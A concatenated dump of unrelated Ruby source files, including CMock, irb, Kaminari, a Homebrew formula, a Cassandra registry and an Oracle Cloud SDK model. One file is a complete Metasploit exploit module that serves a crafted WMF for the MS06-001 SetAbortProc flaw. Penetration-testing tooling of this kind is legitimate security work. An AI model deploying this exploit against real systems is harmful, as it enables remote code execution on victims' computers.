:memcmp_if_unknown => true,
:when_no_prototypes => :warn, #the options being :ignore, :warn, or :error
:when_ptr => :compare_data, #the options being :compare_ptr, :compare_data, or :smart
:verbosity => 2, #the options being 0 errors only, 1 warnings and errors, 2 normal info, 3 verbose
:treat_externs => :exclude, #the options being :include or :exclude
:ignore => :args_and_calls, #the options being :args_and_calls or :args_only
:callback_include_count => true,
:callback_after_arg_check => false,
:includes => nil,
:includes_h_pre_orig_header => nil,
:includes_h_post_orig_header => nil,
:includes_c_pre_header => nil,
:includes_c_post_header => nil
}
def initialize(options=nil)
case(options)
when NilClass then options = CMockDefaultOptions.clone
when String then options = CMockDefaultOptions.clone.merge(load_config_file_from_yaml(options))
when Hash then options = CMockDefaultOptions.clone.merge(options)
else raise "If you specify arguments, it should be a filename or a hash of options"
end
#do some quick type verification
[:plugins, :attributes, :treat_as_void].each do |opt|
unless (options[opt].class == Array)
options[opt] = []
puts "WARNING: :#{opt.to_s} should be an array." unless (options[:verbosity] < 1)
end
end
[:includes, :includes_h_pre_orig_header, :includes_h_post_orig_header, :includes_c_pre_header, :includes_c_post_header].each do |opt|
unless (options[opt].nil? or (options[opt].class == Array))
options[opt] = []
puts "WARNING: :#{opt.to_s} should be an array." unless (options[:verbosity] < 1)
end
end
options[:unity_helper_path] ||= options[:unity_helper]
options[:plugins].compact!
options[:plugins].map! {|p| p.to_sym}
@options = options
treat_as_map = standard_treat_as_map()#.clone
treat_as_map.merge!(@options[:treat_as])
@options[:treat_as] = treat_as_map
@options.each_key { |key| eval("def #{key.to_s}() return @options[:#{key.to_s}] end") }
end
def load_config_file_from_yaml yaml_filename
require 'yaml'
require 'fileutils'
YAML.load_file(yaml_filename)[:cmock]
end
def set_path(path)
@src_path = path
end
def load_unity_helper
return File.new(@options[:unity_helper_path]).read if (@options[:unity_helper_path])
return nil
end
def standard_treat_as_map
{
'int' => 'INT',
'char' => 'INT8',
'short' => 'INT16',
'long' => 'INT',
'int8' => 'INT8',
'int16' => 'INT16',
'int32' => 'INT',
'int8_t' => 'INT8',
'int16_t' => 'INT16',
'int32_t' => 'INT',
'INT8_T' => 'INT8',
'INT16_T' => 'INT16',
'INT32_T' => 'INT',
'bool' => 'INT',
'bool_t' => 'INT',
'BOOL' => 'INT',
'BOOL_T' => 'INT',
'unsigned int' => 'HEX32',
'unsigned long' => 'HEX32',
'uint32' => 'HEX32',
'uint32_t' => 'HEX32',
'UINT32' => 'HEX32',
'UINT32_T' => 'HEX32',
'void*' => 'PTR',
'unsigned short' => 'HEX16',
'uint16' => 'HEX16',
'uint16_t' => 'HEX16',
'UINT16' => 'HEX16',
'UINT16_T' => 'HEX16',
'unsigned char' => 'HEX8',
'uint8' => 'HEX8',
'uint8_t' => 'HEX8',
'UINT8' => 'HEX8',
'UINT8_T' => 'HEX8',
'char*' => 'STRING',
'pCHAR' => 'STRING',
'cstring' => 'STRING',
'CSTRING' => 'STRING',
'float' => 'FLOAT',
'double' => 'FLOAT'
}
end
end
| 38.023077 | 137 | 0.51487 |
b9e235eb2465d51a70cda435906331d863b80b9d | 32 | module EinsteinVisionHelper
end
| 10.666667 | 27 | 0.90625 |
084da0363637544ea938db66fabde428c88ca95c | 189 | module Erlash
class TipFormatter < TemplateFormatter
def format
[].tap do |acc|
acc << object.title
acc << " #{object.description}"
end
end
end
end
| 17.181818 | 40 | 0.57672 |
e8c552a3f59152d58456101f5ab6b5d606e41571 | 6,625 | # frozen_string_literal: false
#
# irb/multi-irb.rb - multiple irb module
# $Release Version: 0.9.6$
# $Revision: 60139 $
# by Keiju ISHITSUKA([email protected])
#
# --
#
#
#
IRB.fail CantShiftToMultiIrbMode unless defined?(Thread)
module IRB
class JobManager
# Creates a new JobManager object
def initialize
@jobs = []
@current_job = nil
end
# The active irb session
attr_accessor :current_job
# The total number of irb sessions, used to set +irb_name+ of the current
# Context.
def n_jobs
@jobs.size
end
# Returns the thread for the given +key+ object, see #search for more
# information.
def thread(key)
th, = search(key)
th
end
# Returns the irb session for the given +key+ object, see #search for more
# information.
def irb(key)
_, irb = search(key)
irb
end
# Returns the top level thread.
def main_thread
@jobs[0][0]
end
# Returns the top level irb session.
def main_irb
@jobs[0][1]
end
# Add the given +irb+ session to the jobs Array.
def insert(irb)
@jobs.push [Thread.current, irb]
end
# Changes the current active irb session to the given +key+ in the jobs
# Array.
#
# Raises an IrbAlreadyDead exception if the given +key+ is no longer alive.
#
# If the given irb session is already active, an IrbSwitchedToCurrentThread
# exception is raised.
def switch(key)
th, irb = search(key)
IRB.fail IrbAlreadyDead unless th.alive?
IRB.fail IrbSwitchedToCurrentThread if th == Thread.current
@current_job = irb
th.run
Thread.stop
@current_job = irb(Thread.current)
end
# Terminates the irb sessions specified by the given +keys+.
#
# Raises an IrbAlreadyDead exception if one of the given +keys+ is already
# terminated.
#
# See Thread#exit for more information.
def kill(*keys)
for key in keys
th, _ = search(key)
IRB.fail IrbAlreadyDead unless th.alive?
th.exit
end
end
# Returns the associated job for the given +key+.
#
# If given an Integer, it will return the +key+ index for the jobs Array.
#
# When an instance of Irb is given, it will return the irb session
# associated with +key+.
#
# If given an instance of Thread, it will return the associated thread
# +key+ using Object#=== on the jobs Array.
#
# Otherwise returns the irb session with the same top-level binding as the
# given +key+.
#
# Raises a NoSuchJob exception if no job can be found with the given +key+.
def search(key)
job = case key
when Integer
@jobs[key]
when Irb
@jobs.find{|k, v| v.equal?(key)}
when Thread
@jobs.assoc(key)
else
@jobs.find{|k, v| v.context.main.equal?(key)}
end
IRB.fail NoSuchJob, key if job.nil?
job
end
# Deletes the job at the given +key+.
def delete(key)
case key
when Integer
IRB.fail NoSuchJob, key unless @jobs[key]
@jobs[key] = nil
else
catch(:EXISTS) do
@jobs.each_index do
|i|
if @jobs[i] and (@jobs[i][0] == key ||
@jobs[i][1] == key ||
@jobs[i][1].context.main.equal?(key))
@jobs[i] = nil
throw :EXISTS
end
end
IRB.fail NoSuchJob, key
end
end
until assoc = @jobs.pop; end unless @jobs.empty?
@jobs.push assoc
end
# Outputs a list of jobs, see the irb command +irb_jobs+, or +jobs+.
def inspect
ary = []
@jobs.each_index do
|i|
th, irb = @jobs[i]
next if th.nil?
if th.alive?
if th.stop?
t_status = "stop"
else
t_status = "running"
end
else
t_status = "exited"
end
ary.push format("#%d->%s on %s (%s: %s)",
i,
irb.context.irb_name,
irb.context.main,
th,
t_status)
end
ary.join("\n")
end
end
@JobManager = JobManager.new
# The current JobManager in the session
def IRB.JobManager
@JobManager
end
# The current Context in this session
def IRB.CurrentContext
IRB.JobManager.irb(Thread.current).context
end
# Creates a new IRB session, see Irb.new.
#
# The optional +file+ argument is given to Context.new, along with the
# workspace created with the remaining arguments, see WorkSpace.new
def IRB.irb(file = nil, *main)
workspace = WorkSpace.new(*main)
parent_thread = Thread.current
Thread.start do
begin
irb = Irb.new(workspace, file)
rescue
print "Subirb can't start with context(self): ", workspace.main.inspect, "\n"
print "return to main irb\n"
Thread.pass
Thread.main.wakeup
Thread.exit
end
@CONF[:IRB_RC].call(irb.context) if @CONF[:IRB_RC]
@JobManager.insert(irb)
@JobManager.current_job = irb
begin
system_exit = false
catch(:IRB_EXIT) do
irb.eval_input
end
rescue SystemExit
system_exit = true
raise
#fail
ensure
unless system_exit
@JobManager.delete(irb)
if @JobManager.current_job == irb
if parent_thread.alive?
@JobManager.current_job = @JobManager.irb(parent_thread)
parent_thread.run
else
@JobManager.current_job = @JobManager.main_irb
@JobManager.main_thread.run
end
end
end
end
end
Thread.stop
@JobManager.current_job = @JobManager.irb(Thread.current)
end
@CONF[:SINGLE_IRB_MODE] = false
@JobManager.insert(@CONF[:MAIN_CONTEXT].irb)
@JobManager.current_job = @CONF[:MAIN_CONTEXT].irb
class Irb
def signal_handle
unless @context.ignore_sigint?
print "\nabort!!\n" if @context.verbose?
exit
end
case @signal_status
when :IN_INPUT
print "^C\n"
IRB.JobManager.thread(self).raise RubyLex::TerminateLineInput
when :IN_EVAL
IRB.irb_abort(self)
when :IN_LOAD
IRB.irb_abort(self, LoadAbort)
when :IN_IRB
# ignore
else
# ignore other cases as well
end
end
end
trap("SIGINT") do
@JobManager.current_job.signal_handle
Thread.stop
end
end
| 24.906015 | 85 | 0.581283 |
bb7a425eff3fd420fc4116c9f5d48721d8f988bb | 584 | module Kaminari
module ConfigurationMethods
extend ActiveSupport::Concern
module ClassMethods
# Overrides the default +per_page+ value per model
# class Article < ActiveRecord::Base
# paginates_per 10
# end
def paginates_per(val)
@_default_per_page = val
end
# This model's default +per_page+ value
# returns +default_per_page+ value unless explicitly overridden via <tt>paginates_per</tt>
def default_per_page
@_default_per_page ||= Kaminari.config.default_per_page
end
end
end
end
| 27.809524 | 96 | 0.674658 |
1ad1a56a4ce2c8a9f925811e1588532e79f47ffe | 1,421 | class CsvFix < Formula
desc "Tool for manipulating CSV data"
homepage "https://neilb.bitbucket.io/csvfix/"
url "https://bitbucket.org/neilb/csvfix/get/version-1.6.tar.gz"
sha256 "32982aa0daa933140e1ea5a667fb71d8adc731cc96068de3a8e83815be62c52b"
license "MIT"
bottle do
cellar :any_skip_relocation
sha256 "3cc10313342650c680f23241e19ff8ec6b64df8fcc2123c5161b15e992c8973b" => :catalina
sha256 "93a9586c3ef8614be909c0e5ac5bb463536dab6fcbfc00bb1e94fc6affbe7248" => :mojave
sha256 "e02b2cb8929617c91a258c313481097146259a9ed68094bd759c30c3cc75806e" => :high_sierra
sha256 "b52224f7cd1dd228ffe751c67993f854a8a59f17d6099d40fca02374f1949d02" => :sierra
sha256 "ba19053a978b57b6b962f8fa24d099d964ceb90cd28304e3a6c2a7fe0d3abc32" => :el_capitan
sha256 "b8dbaf2e14e35cc4c1d7b5d04a5615377f7eeb4d9b1f25fe554b8711511c28f6" => :yosemite
sha256 "0b86933c8e32830d5abd0f26ef83b1a60e0254da67542b695fd50ab1e3ba2e68" => :mavericks
sha256 "c4342077ef0be14c36cb6b367a5d78aba77964cb2cba0b52cbbdd5346fb42f06" => :x86_64_linux
end
disable! date: "2020-12-08", because: :repo_removed
def install
# clang on Mt. Lion will try to build against libstdc++,
# despite -std=gnu++0x
ENV.libcxx
system "make", "lin"
bin.install "csvfix/bin/csvfix"
end
test do
assert_equal '"foo","bar"',
pipe_output("#{bin}/csvfix trim", "foo , bar \n").chomp
end
end
| 39.472222 | 94 | 0.771992 |
210b0576f05fd4a455b7dcdfa1c32fd19720800c | 5,091 | # encoding: utf-8
#--
# Copyright 2013-2015 DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#++
module Cassandra
class Cluster
# @private
class Registry
include MonitorMixin
def initialize(logger)
@logger = logger
@hosts = ::Hash.new
@listeners = ::Array.new
mon_initialize
end
def add_listener(listener)
synchronize do
listeners = @listeners.dup
listeners.push(listener)
@listeners = listeners
end
self
end
def remove_listener(listener)
synchronize do
listeners = @listeners.dup
listeners.delete(listener)
@listeners = listeners
end
self
end
def each_host(&block)
if block_given?
@hosts.each_value(&block)
self
else
@hosts.values
end
end
alias :hosts :each_host
def host(address)
@hosts[address.to_s]
end
def has_host?(address)
@hosts.has_key?(address.to_s)
end
def host_found(address, data = {})
ip = address.to_s
host = @hosts[ip]
if host
if host.id == data['host_id'] &&
host.release_version == data['release_version'] &&
host.rack == data['rack'] &&
host.datacenter == data['data_center']
return self if host.up?
host = toggle_up(host)
else
@logger.debug("Host #{host.ip} metadata has been updated, it will be considered lost and found")
notify_lost(host)
host = create_host(address, data)
notify_found(host)
end
else
host = create_host(address, data)
notify_found(host)
end
synchronize do
hosts = @hosts.dup
hosts[ip] = host
@hosts = hosts
end
self
end
def host_down(address)
ip = address.to_s
host = @hosts[ip]
return self unless host && !host.down?
host = toggle_down(host)
synchronize do
hosts = @hosts.dup
hosts[ip] = host
@hosts = hosts
end
self
end
def host_up(address)
ip = address.to_s
host = @hosts[ip]
return self unless host && !host.up?
host = toggle_up(host)
synchronize do
hosts = @hosts.dup
hosts[ip] = host
@hosts = hosts
end
self
end
def host_lost(address)
ip = address.to_s
host = nil
return self unless @hosts.has_key?(ip)
synchronize do
hosts = @hosts.dup
host = hosts.delete(ip)
@hosts = hosts
end
notify_lost(host)
host
end
private
def create_host(ip, data)
Host.new(ip, data['host_id'], data['rack'], data['data_center'], data['release_version'], Array(data['tokens']).freeze, :up)
end
def toggle_up(host)
host = Host.new(host.ip, host.id, host.rack, host.datacenter, host.release_version, host.tokens, :up)
@logger.debug("Host #{host.ip} is up")
@listeners.each do |listener|
listener.host_up(host) rescue nil
end
host
end
def toggle_down(host)
host = Host.new(host.ip, host.id, host.rack, host.datacenter, host.release_version, host.tokens, :down)
@logger.debug("Host #{host.ip} is down")
@listeners.reverse_each do |listener|
listener.host_down(host) rescue nil
end
host
end
def notify_lost(host)
if host.up?
@logger.debug("Host #{host.ip} is down and lost")
host = Host.new(host.ip, host.id, host.rack, host.datacenter, host.release_version, host.tokens, :down)
@listeners.reverse_each do |listener|
listener.host_down(host) rescue nil
listener.host_lost(host) rescue nil
end
else
@logger.debug("Host #{host.ip} is lost")
@listeners.reverse_each do |listener|
listener.host_lost(host) rescue nil
end
end
end
def notify_found(host)
@logger.debug("Host #{host.ip} is found and up")
@listeners.each do |listener|
listener.host_found(host) rescue nil
listener.host_up(host) rescue nil
end
end
end
end
end
| 24.358852 | 132 | 0.554901 |
ed1da559dd06fa20fa3bc0fd0df1600820376415 | 5,263 | ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
#
# This module acts as an HTTP server
#
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution',
'Description' => %q{
This module exploits a vulnerability in the GDI library included with
Windows XP and 2003. This vulnerability uses the 'Escape' metafile function
to execute arbitrary code through the SetAbortProc procedure. This module
generates a random WMF record stream for each request.
},
'License' => MSF_LICENSE,
'Author' =>
[
'hdm',
'san <san[at]xfocus.org>',
'[email protected]',
],
'References' =>
[
['CVE', '2005-4560'],
['OSVDB', '21987'],
['MSB', 'MS06-001'],
['BID', '16074'],
['URL', 'http://www.microsoft.com/technet/security/advisory/912840.mspx'],
['URL', 'http://wvware.sourceforge.net/caolan/ora-wmf.html'],
['URL', 'http://www.geocad.ru/new/site/Formats/Graphics/wmf/wmf.txt'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 1000 + (rand(256).to_i * 4),
'BadChars' => "\x00",
'Compat' =>
{
'ConnectionType' => '-find',
},
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP/2003/Vista Automatic', { }],
],
'DisclosureDate' => 'Dec 27 2005',
'DefaultTarget' => 0))
end
def on_request_uri(cli, request)
ext = 'wmf'
if (not request.uri.match(/\.wmf$/i))
if ("/" == get_resource[-1,1])
wmf_uri = get_resource[0, get_resource.length - 1]
else
wmf_uri = get_resource
end
wmf_uri << "/" + rand_text_alphanumeric(rand(80)+16) + "." + ext
html = "<html><meta http-equiv='refresh' content='0; " +
"URL=#{wmf_uri}'><body>One second please...</body></html>"
send_response_html(cli, html)
return
end
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
print_status("Sending #{self.name}")
# Transmit the compressed response to the client
send_response(cli, generate_metafile(p), { 'Content-Type' => 'text/plain' })
# Handle the payload
handler(cli)
end
def generate_metafile(payload)
# Minimal length values before and after the Escape record
pre_mlen = 1440 + rand(8192)
suf_mlen = 128 + rand(8192)
# Track the number of generated records
fill = 0
# The prefix and suffix buffers
pre_buff = ''
suf_buff = ''
# Generate the prefix
while (pre_buff.length < pre_mlen)
pre_buff << generate_record()
fill += 1
end
# Generate the suffix
while (suf_buff.length < suf_mlen)
suf_buff << generate_record()
fill += 1
end
clen = 18 + 8 + 6 + payload.encoded.length + pre_buff.length + suf_buff.length
data =
#
# WindowsMetaHeader
#
[
# WORD FileType; /* Type of metafile (1=memory, 2=disk) */
rand(2)+1,
# WORD HeaderSize; /* Size of header in WORDS (always 9) */
9,
# WORD Version; /* Version of Microsoft Windows used */
( rand(2).to_i == 1 ? 0x0300 : 0x0100 ),
# DWORD FileSize; /* Total size of the metafile in WORDs */
clen/2,
# WORD NumOfObjects; /* Number of objects in the file */
rand(0xffff),
# DWORD MaxRecordSize; /* The size of largest record in WORDs */
rand(0xffffffff),
# WORD NumOfParams; /* Not Used (always 0) */
rand(0xffff),
].pack('vvvVvVv') +
#
# Filler data
#
pre_buff +
#
# StandardMetaRecord - Escape()
#
[
# DWORD Size; /* Total size of the record in WORDs */
4,
# WORD Function; /* Function number (defined in WINDOWS.H) */
(rand(256).to_i << 8) + 0x26,
# WORD Parameters[]; /* Parameter values passed to function */
9,
].pack('Vvv') + payload.encoded +
#
# Filler data
#
suf_buff +
#
# Complete the stream
#
[3, 0].pack('Vv') +
#
# Some extra fun padding
#
rand_text(rand(16384)+1024)
return data
end
def generate_record
type = rand(3)
case type
when 0
# CreatePenIndirect
return [8, 0x02fa].pack('Vv') + rand_text(10)
when 1
# CreateBrushIndirect
return [7, 0x02fc].pack('Vv') + rand_text(8)
else
# Rectangle
return [7, 0x041b].pack('Vv') + rand_text(8)
end
end
end
| 27.411458 | 96 | 0.543036 |
1aeae3df3d7a345e236d873845cb888d0ed63293 | 1,099 | # frozen_string_literal: true
require 'rails_helper'
require 'sn_foil/rails/controller/base'
RSpec.describe SnFoil::Rails::Controller::Base do
let(:subject) { described_class }
it 'includes ChangeControllerConcern' do
expect(subject.ancestors).to include(SnFoil::Rails::Controller::Concerns::ChangeControllerConcern)
end
it 'includes CreateControllerConcern' do
expect(subject.ancestors).to include(SnFoil::Rails::Controller::Concerns::CreateControllerConcern)
end
it 'includes DestroyControllerConcern' do
expect(subject.ancestors).to include(SnFoil::Rails::Controller::Concerns::DestroyControllerConcern)
end
it 'includes IndexControllerConcern' do
expect(subject.ancestors).to include(SnFoil::Rails::Controller::Concerns::IndexControllerConcern)
end
it 'includes ShowControllerConcern' do
expect(subject.ancestors).to include(SnFoil::Rails::Controller::Concerns::ShowControllerConcern)
end
it 'includes UpdateControllerConcern' do
expect(subject.ancestors).to include(SnFoil::Rails::Controller::Concerns::UpdateControllerConcern)
end
end
| 33.30303 | 103 | 0.788899 |
38765158eac94b91920b748cf16a306389556d4f | 1,190 | require 'test_helper'
class TradesControllerTest < ActionDispatch::IntegrationTest
setup do
@trade = trades(:one)
end
test "should get index" do
get trades_url
assert_response :success
end
test "should get new" do
get new_trade_url
assert_response :success
end
test "should create trade" do
assert_difference('Trade.count') do
post trades_url, params: { trade: { from: @trade.from, product_id: @trade.product_id, sold_by: @trade.sold_by, sold_to: @trade.sold_to, to: @trade.to } }
end
assert_redirected_to trade_url(Trade.last)
end
test "should show trade" do
get trade_url(@trade)
assert_response :success
end
test "should get edit" do
get edit_trade_url(@trade)
assert_response :success
end
test "should update trade" do
patch trade_url(@trade), params: { trade: { from: @trade.from, product_id: @trade.product_id, sold_by: @trade.sold_by, sold_to: @trade.sold_to, to: @trade.to } }
assert_redirected_to trade_url(@trade)
end
test "should destroy trade" do
assert_difference('Trade.count', -1) do
delete trade_url(@trade)
end
assert_redirected_to trades_url
end
end
| 24.285714 | 165 | 0.702521 |
aca4a7adb1df20ecaede2230836711b0ce578c6a | 212 | class Preference < ActiveRecord::Base
belongs_to :candidate, class_name: "User"
belongs_to :user, class_name: "User"
validates :candidate_id, presence: true
validates :user_id, presence: true
end
| 30.285714 | 45 | 0.735849 |
ffc3df365a76d29749a601a20acb4d8ca0cd254d | 251 | require 'rails_helper'
RSpec.describe "restaurants/index", type: :view do
before(:each) do
assign(:restaurants, [
Restaurant.create!(),
Restaurant.create!()
])
end
it "renders a list of restaurants" do
render
end
end
| 16.733333 | 50 | 0.649402 |
61f264f546f2cee17dde3e8f1d44a9e0d41f4d6e | 16,212 | # Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
require 'date'
require 'logger'
require_relative 'data_entity'
# rubocop:disable Lint/UnneededCopDisableDirective, Metrics/LineLength
module OCI
# The view entity data entity details.
class DataIntegration::Models::DataEntityFromView < DataIntegration::Models::DataEntity
ENTITY_TYPE_ENUM = [
ENTITY_TYPE_TABLE = 'TABLE'.freeze,
ENTITY_TYPE_VIEW = 'VIEW'.freeze,
ENTITY_TYPE_FILE = 'FILE'.freeze,
ENTITY_TYPE_QUEUE = 'QUEUE'.freeze,
ENTITY_TYPE_STREAM = 'STREAM'.freeze,
ENTITY_TYPE_OTHER = 'OTHER'.freeze,
ENTITY_TYPE_UNKNOWN_ENUM_VALUE = 'UNKNOWN_ENUM_VALUE'.freeze
].freeze
# The object key.
# @return [String]
attr_accessor :key
# The object's model version.
# @return [String]
attr_accessor :model_version
# @return [OCI::DataIntegration::Models::ParentReference]
attr_accessor :parent_ref
# Free form text without any restriction on permitted characters. Name can have letters, numbers, and special characters. The value is editable and is restricted to 1000 characters.
# @return [String]
attr_accessor :name
# Detailed description for the object.
# @return [String]
attr_accessor :description
# The version of the object that is used to track changes in the object instance.
# @return [Integer]
attr_accessor :object_version
# The external key for the object
# @return [String]
attr_accessor :external_key
# @return [OCI::DataIntegration::Models::Shape]
attr_accessor :shape
# The shape ID.
# @return [String]
attr_accessor :shape_id
# @return [OCI::DataIntegration::Models::TypeLibrary]
attr_accessor :types
# The entity type.
# @return [String]
attr_reader :entity_type
# Specifies other type label.
# @return [String]
attr_accessor :other_type_label
# An array of unique keys.
# @return [Array<OCI::DataIntegration::Models::UniqueKey>]
attr_accessor :unique_keys
# An array of foreign keys.
# @return [Array<OCI::DataIntegration::Models::ForeignKey>]
attr_accessor :foreign_keys
# The resource name.
# @return [String]
attr_accessor :resource_name
# The status of an object that can be set to value 1 for shallow references across objects, other values reserved.
# @return [Integer]
attr_accessor :object_status
# Value can only contain upper case letters, underscore and numbers. It should begin with upper case letter or underscore. The value can be modified.
# @return [String]
attr_accessor :identifier
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
# rubocop:disable Style/SymbolLiteral
'model_type': :'modelType',
'metadata': :'metadata',
'key': :'key',
'model_version': :'modelVersion',
'parent_ref': :'parentRef',
'name': :'name',
'description': :'description',
'object_version': :'objectVersion',
'external_key': :'externalKey',
'shape': :'shape',
'shape_id': :'shapeId',
'types': :'types',
'entity_type': :'entityType',
'other_type_label': :'otherTypeLabel',
'unique_keys': :'uniqueKeys',
'foreign_keys': :'foreignKeys',
'resource_name': :'resourceName',
'object_status': :'objectStatus',
'identifier': :'identifier'
# rubocop:enable Style/SymbolLiteral
}
end
# Attribute type mapping.
def self.swagger_types
{
# rubocop:disable Style/SymbolLiteral
'model_type': :'String',
'metadata': :'OCI::DataIntegration::Models::ObjectMetadata',
'key': :'String',
'model_version': :'String',
'parent_ref': :'OCI::DataIntegration::Models::ParentReference',
'name': :'String',
'description': :'String',
'object_version': :'Integer',
'external_key': :'String',
'shape': :'OCI::DataIntegration::Models::Shape',
'shape_id': :'String',
'types': :'OCI::DataIntegration::Models::TypeLibrary',
'entity_type': :'String',
'other_type_label': :'String',
'unique_keys': :'Array<OCI::DataIntegration::Models::UniqueKey>',
'foreign_keys': :'Array<OCI::DataIntegration::Models::ForeignKey>',
'resource_name': :'String',
'object_status': :'Integer',
'identifier': :'String'
# rubocop:enable Style/SymbolLiteral
}
end
# rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
# rubocop:disable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
# @option attributes [OCI::DataIntegration::Models::ObjectMetadata] :metadata The value to assign to the {OCI::DataIntegration::Models::DataEntity#metadata #metadata} proprety
# @option attributes [String] :key The value to assign to the {#key} property
# @option attributes [String] :model_version The value to assign to the {#model_version} property
# @option attributes [OCI::DataIntegration::Models::ParentReference] :parent_ref The value to assign to the {#parent_ref} property
# @option attributes [String] :name The value to assign to the {#name} property
# @option attributes [String] :description The value to assign to the {#description} property
# @option attributes [Integer] :object_version The value to assign to the {#object_version} property
# @option attributes [String] :external_key The value to assign to the {#external_key} property
# @option attributes [OCI::DataIntegration::Models::Shape] :shape The value to assign to the {#shape} property
# @option attributes [String] :shape_id The value to assign to the {#shape_id} property
# @option attributes [OCI::DataIntegration::Models::TypeLibrary] :types The value to assign to the {#types} property
# @option attributes [String] :entity_type The value to assign to the {#entity_type} property
# @option attributes [String] :other_type_label The value to assign to the {#other_type_label} property
# @option attributes [Array<OCI::DataIntegration::Models::UniqueKey>] :unique_keys The value to assign to the {#unique_keys} property
# @option attributes [Array<OCI::DataIntegration::Models::ForeignKey>] :foreign_keys The value to assign to the {#foreign_keys} property
# @option attributes [String] :resource_name The value to assign to the {#resource_name} property
# @option attributes [Integer] :object_status The value to assign to the {#object_status} property
# @option attributes [String] :identifier The value to assign to the {#identifier} property
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
attributes['modelType'] = 'VIEW_ENTITY'
super(attributes)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
self.key = attributes[:'key'] if attributes[:'key']
self.model_version = attributes[:'modelVersion'] if attributes[:'modelVersion']
raise 'You cannot provide both :modelVersion and :model_version' if attributes.key?(:'modelVersion') && attributes.key?(:'model_version')
self.model_version = attributes[:'model_version'] if attributes[:'model_version']
self.parent_ref = attributes[:'parentRef'] if attributes[:'parentRef']
raise 'You cannot provide both :parentRef and :parent_ref' if attributes.key?(:'parentRef') && attributes.key?(:'parent_ref')
self.parent_ref = attributes[:'parent_ref'] if attributes[:'parent_ref']
self.name = attributes[:'name'] if attributes[:'name']
self.description = attributes[:'description'] if attributes[:'description']
self.object_version = attributes[:'objectVersion'] if attributes[:'objectVersion']
raise 'You cannot provide both :objectVersion and :object_version' if attributes.key?(:'objectVersion') && attributes.key?(:'object_version')
self.object_version = attributes[:'object_version'] if attributes[:'object_version']
self.external_key = attributes[:'externalKey'] if attributes[:'externalKey']
raise 'You cannot provide both :externalKey and :external_key' if attributes.key?(:'externalKey') && attributes.key?(:'external_key')
self.external_key = attributes[:'external_key'] if attributes[:'external_key']
self.shape = attributes[:'shape'] if attributes[:'shape']
self.shape_id = attributes[:'shapeId'] if attributes[:'shapeId']
raise 'You cannot provide both :shapeId and :shape_id' if attributes.key?(:'shapeId') && attributes.key?(:'shape_id')
self.shape_id = attributes[:'shape_id'] if attributes[:'shape_id']
self.types = attributes[:'types'] if attributes[:'types']
self.entity_type = attributes[:'entityType'] if attributes[:'entityType']
raise 'You cannot provide both :entityType and :entity_type' if attributes.key?(:'entityType') && attributes.key?(:'entity_type')
self.entity_type = attributes[:'entity_type'] if attributes[:'entity_type']
self.other_type_label = attributes[:'otherTypeLabel'] if attributes[:'otherTypeLabel']
raise 'You cannot provide both :otherTypeLabel and :other_type_label' if attributes.key?(:'otherTypeLabel') && attributes.key?(:'other_type_label')
self.other_type_label = attributes[:'other_type_label'] if attributes[:'other_type_label']
self.unique_keys = attributes[:'uniqueKeys'] if attributes[:'uniqueKeys']
raise 'You cannot provide both :uniqueKeys and :unique_keys' if attributes.key?(:'uniqueKeys') && attributes.key?(:'unique_keys')
self.unique_keys = attributes[:'unique_keys'] if attributes[:'unique_keys']
self.foreign_keys = attributes[:'foreignKeys'] if attributes[:'foreignKeys']
raise 'You cannot provide both :foreignKeys and :foreign_keys' if attributes.key?(:'foreignKeys') && attributes.key?(:'foreign_keys')
self.foreign_keys = attributes[:'foreign_keys'] if attributes[:'foreign_keys']
self.resource_name = attributes[:'resourceName'] if attributes[:'resourceName']
raise 'You cannot provide both :resourceName and :resource_name' if attributes.key?(:'resourceName') && attributes.key?(:'resource_name')
self.resource_name = attributes[:'resource_name'] if attributes[:'resource_name']
self.object_status = attributes[:'objectStatus'] if attributes[:'objectStatus']
raise 'You cannot provide both :objectStatus and :object_status' if attributes.key?(:'objectStatus') && attributes.key?(:'object_status')
self.object_status = attributes[:'object_status'] if attributes[:'object_status']
self.identifier = attributes[:'identifier'] if attributes[:'identifier']
end
# rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
# rubocop:enable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
# Custom attribute writer method checking allowed values (enum).
# @param [Object] entity_type Object to be assigned
def entity_type=(entity_type)
# rubocop:disable Style/ConditionalAssignment
if entity_type && !ENTITY_TYPE_ENUM.include?(entity_type)
OCI.logger.debug("Unknown value for 'entity_type' [" + entity_type + "]. Mapping to 'ENTITY_TYPE_UNKNOWN_ENUM_VALUE'") if OCI.logger
@entity_type = ENTITY_TYPE_UNKNOWN_ENUM_VALUE
else
@entity_type = entity_type
end
# rubocop:enable Style/ConditionalAssignment
end
# rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
# Checks equality by comparing each attribute.
# @param [Object] other the other object to be compared
def ==(other)
return true if equal?(other)
self.class == other.class &&
